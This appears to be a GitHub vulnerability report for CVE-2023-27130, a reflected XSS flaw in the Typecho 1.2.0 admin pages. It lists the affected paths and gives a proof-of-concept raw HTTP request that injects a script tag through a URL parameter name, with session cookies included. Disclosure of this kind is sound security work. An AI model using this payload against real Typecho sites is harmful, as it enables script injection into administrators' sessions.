Headline
CVE-2023-27130: Typecho <= 1.2.0 Admin System with Reflected-XSS Vulnerability · Issue #1535 · typecho/typecho
Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via an arbitrarily supplied URL parameter.
Typecho <= 1.2.0 Admin System with Reflected-XSS****Influenced Version
Typecho <= 1.2.0
Description
Typecho admin backend management system with reflected-XSS in the name of an arbitrarily supplied URL parameter.
- Login to typecho admin backend management system, in "/admin/index.php", “admin/themes.php” or "/admin/backup.php".
- In the name of an arbitrarily supplied URL parameter, no matter key or value, will be injected to a html href attribute of <a> tag.
POC
GET /typecho/admin/?"><script>alert(1)</script><!--bbb=1 HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Ftypecho%2Fadmin%2Findex.php%3Fr7ptu%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eat2f7%3D1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: e4dff44224c23efabc177d44e50b1de4__typecho_uid=1; e4dff44224c23efabc177d44e50b1de4__typecho_authCode=%24T%248O0qulQf98a49e06253d4ae8c93f478424457be4b; PHPSESSID=m7h7isuus6cugk6mb58vdah296
Connection: close
/admin/index.php
/admin/theme.php
/admin/backup.php
Reported by Srpopty, vulnerability discovered by using Corax.